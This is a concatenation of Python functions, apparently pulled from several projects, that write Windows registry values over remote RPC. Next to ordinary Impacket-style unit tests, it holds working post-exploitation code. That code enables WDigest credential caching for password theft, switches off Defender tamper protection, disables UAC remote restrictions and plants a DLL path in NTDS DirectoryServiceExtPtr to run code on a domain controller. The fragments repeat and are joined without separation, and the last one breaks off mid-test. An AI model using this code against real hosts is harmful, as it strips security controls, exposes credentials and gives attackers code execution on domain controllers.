def enable(self): remoteOps = RemoteOperations(self.smbconnection, self.doKerb) remoteOps.enableRegistry() self.rrp = remoteOps._RemoteOperations__rrp if self.rrp is not None: ans = rrp.hOpenLocalMachine(self.rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey( self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' ) keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') if int(data) == 1: self.logger.success( 'UseLogonCredential registry key created successfully') try: remoteOps.finish() except: pass
def rdp_disable(self, context, smbconnection): remoteOps = RemoteOperations(smbconnection, False) remoteOps.enableRegistry() if remoteOps._RemoteOperations__rrp: ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Terminal Server') keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'fDenyTSConnections\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue( remoteOps._RemoteOperations__rrp, keyHandle, 'fDenyTSConnections\x00') if int(data) == 1: context.log.success('RDP disabled successfully') try: remoteOps.finish() except: pass
def wdigest_enable(self, context, smbconnection): remoteOps = RemoteOperations(smbconnection, False) remoteOps.enableRegistry() if remoteOps._RemoteOperations__rrp: ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' ) keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue( remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00') if int(data) == 1: context.log.success( 'UseLogonCredential registry key created successfully') try: remoteOps.finish() except: pass
def start(remoteName, remoteHost, username, password, dllPath): winreg_bind = r'ncacn_np:445[\pipe\winreg]' hRootKey = None subkey = None rrpclient = None print("[*] Connecting to remote registry") try: rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg', username, password, "", "", "", "") except (Exception) as e: print("[x] Error establishing SMB connection: %s" % e) return try: # Set up winreg RPC rrpclient = rpctransport.get_dce_rpc() rrpclient.connect() rrpclient.bind(rrp.MSRPC_UUID_RRP) except (Exception) as e: print("[x] Error binding to remote registry: %s" % e) return print("[*] Connection established") print( "[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr" ) try: # Add a new registry key ans = rrp.hOpenLocalMachine(rrpclient) hRootKey = ans['phKey'] subkey = rrp.hBaseRegOpenKey( rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS") rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"], "DirectoryServiceExtPt", 1, dllPath) except (Exception) as e: print("[x] Error communicating with remote registry: %s" % e) return print("[*] Registry value created, DLL will be loaded from %s" % (dllPath)) trigger_samr(remoteHost, username, password) print("[*] Removing registry entry") try: rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"], "DirectoryServiceExtPt") except (Exception) as e: print("[x] Error deleting from remote registry: %s" % e) return print("[*] All done")
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception as e: print(e) type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue('HOLA COMO TE VA\x00' == data)
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception as e: print e type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue( 'HOLA COMO TE VA\x00' == data )
def disableTamper(self, dce): # try: ans = rrp.hOpenLocalMachine( dce) # gets handle for HKEY_LOCAL_MACHINE regHandle = ans['phKey'] except Exception as e: logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e)) return try: resp = rrp.hBaseRegCreateKey( dce, regHandle, 'SOFTWARE\\Microsoft\\Windows Defender\\Features') keyHandle = resp['phkResult'] except Exception as e: logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e)) return # TamperProtection try: resp = rrp.hBaseRegSetValue(dce, keyHandle, 'TamperProtection\x00', rrp.REG_DWORD, 0) self.logger.highlight( 'TamperProtection Key Set! TamperProtection is now off!') except Exception as e: logging.debug( 'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e)) self.logger.error('Could not set TamperProtection Key') pass
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, self.test_key) resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, self.test_value_name, rrp.REG_SZ, self.test_value_data) resp.dump() except Exception as e: print(e) type, data = rrp.hBaseRegQueryValue(dce, phKey, self.test_value_name) resp = rrp.hBaseRegDeleteValue(dce, phKey, self.test_value_name) resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, self.test_key) resp.dump() self.assertEqual(self.test_value_data, data)
def enableUAC(self, dce): # this actually disables UAC but the key is enable.... try: ans = rrp.hOpenLocalMachine(dce) regHandle = ans['phKey'] except Exception as e: logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e)) return try: resp = rrp.hBaseRegCreateKey( dce, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' ) keyHandle = resp['phkResult'] except Exception as e: logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e)) return # EnableLUA try: resp = rrp.hBaseRegSetValue(dce, keyHandle, 'EnableLUA\x00', rrp.REG_DWORD, 0) self.logger.highlight('EnableLUA Key Set!') except Exception as e: logging.debug( 'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e)) self.logger.error('Could not set EnableLUA Key') pass # LocalAccountTokenFilterPolicy try: resp = rrp.hBaseRegSetValue(dce, keyHandle, 'LocalAccountTokenFilterPolicy\x00', rrp.REG_DWORD, 1) self.logger.highlight('LocalAccountTokenFilterPolicy Key Set!') except Exception as e: logging.debug( 'Exception thrown when hBaseRegSetValue LocalAccountTokenFilterPolicy: %s', str(e)) self.logger.error( 'Could not set LocalAccountTokenFilterPolicy Key') return
def add(self, dce, keyName): hRootKey, subKey = self.__strip_root_key(dce, keyName) # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006) if self.__options.v is None: # Try to create subkey subKeyCreate = subKey subKey = '\\'.join(subKey.split('\\')[:-1]) ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY) # Should I use ans2? ans3 = rrp.hBaseRegCreateKey( dce, hRootKey, subKeyCreate, samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY ) if ans3['ErrorCode'] == 0: print('Successfully set subkey %s' % ( keyName )) else: print('Error 0x%08x while creating subkey %s' % ( ans3['ErrorCode'], keyName )) else: # Try to set value of key ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY) dwType = getattr(rrp, self.__options.vt, None) if dwType is None or not self.__options.vt.startswith('REG_'): raise Exception('Error parsing value type %s' % self.__options.vt) #Fix (?) for packValue function if dwType in ( rrp.REG_DWORD, rrp.REG_DWORD_BIG_ENDIAN, rrp.REG_DWORD_LITTLE_ENDIAN, rrp.REG_QWORD, rrp.REG_QWORD_LITTLE_ENDIAN ): valueData = int(self.__options.vd) else: valueData = self.__options.vd ans3 = rrp.hBaseRegSetValue( dce, ans2['phkResult'], self.__options.v, dwType, valueData ) if ans3['ErrorCode'] == 0: print('Successfully set key %s\\%s of type %s to value %s' % ( keyName, self.__options.v, self.__options.vt, valueData )) else: print('Error 0x%08x while setting key %s\\%s of type %s to value %s' % ( ans3['ErrorCode'], keyName, self.__options.v, self.__options.vt, valueData ))
def wdigest_enable(self, context, smbconnection): remoteOps = RemoteOperations(smbconnection, False) remoteOps.enableRegistry() if remoteOps._RemoteOperations__rrp: ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00') if int(data) == 1: context.log.success('UseLogonCredential registry key created successfully') try: remoteOps.finish() except: pass
def enable(self): remoteOps = RemoteOperations(self.smbconnection, self.doKerb) remoteOps.enableRegistry() self.rrp = remoteOps._RemoteOperations__rrp if self.rrp is not None: ans = rrp.hOpenLocalMachine(self.rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00') rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') if int(data) == 1: self.logger.success('UseLogonCredential registry key created successfully') try: remoteOps.finish() except: pass
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) #resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') #resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') #resp.dump() except Exception, e: print e